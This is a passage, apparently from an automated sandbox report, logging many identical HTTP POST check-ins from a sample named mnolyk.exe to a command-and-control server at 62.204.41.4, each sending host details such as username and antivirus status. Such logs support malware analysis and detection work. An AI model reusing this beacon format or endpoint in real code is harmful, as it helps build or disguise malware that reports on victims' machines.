                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:04.488599062 CET800INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      686192.168.2.75038162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:04.673243999 CET801OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:04.736589909 CET801INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      687192.168.2.75038262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:04.927710056 CET802OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:04.992121935 CET802INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      688192.168.2.75038362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:05.178761959 CET803OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:05.245376110 CET803INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      689192.168.2.75038462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:05.420068026 CET804OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:05.483033895 CET804INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      69192.168.2.74976462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:18.587959051 CET184OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:18.652221918 CET184INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      690192.168.2.75038562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:05.658909082 CET805OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:05.722368002 CET805INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      691192.168.2.75038662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:05.891433001 CET806OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:05.956211090 CET806INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      692192.168.2.75038762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:06.125158072 CET807OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:06.190597057 CET807INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      693192.168.2.75038862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:06.372796059 CET808OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:06.436383963 CET808INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      694192.168.2.75038962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:06.609150887 CET809OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:06.672586918 CET809INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      695192.168.2.75039062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:06.856141090 CET810OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:06.920361042 CET810INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      696192.168.2.75039162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:07.091831923 CET811OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:07.157641888 CET811INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      697192.168.2.75039262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:07.350927114 CET812OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:07.414670944 CET812INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      698192.168.2.75039362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:07.593302965 CET813OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:07.657994032 CET813INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      699192.168.2.75039462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:07.826262951 CET814OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:07.891798019 CET814INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.74970162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:03.267556906 CET111OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:03.329868078 CET111INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      70192.168.2.74976562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:19.352231026 CET185OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:19.415371895 CET185INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      700192.168.2.75039562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:08.061096907 CET815OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:08.126143932 CET815INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      701192.168.2.75039662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:08.320216894 CET816OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:08.385463953 CET816INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
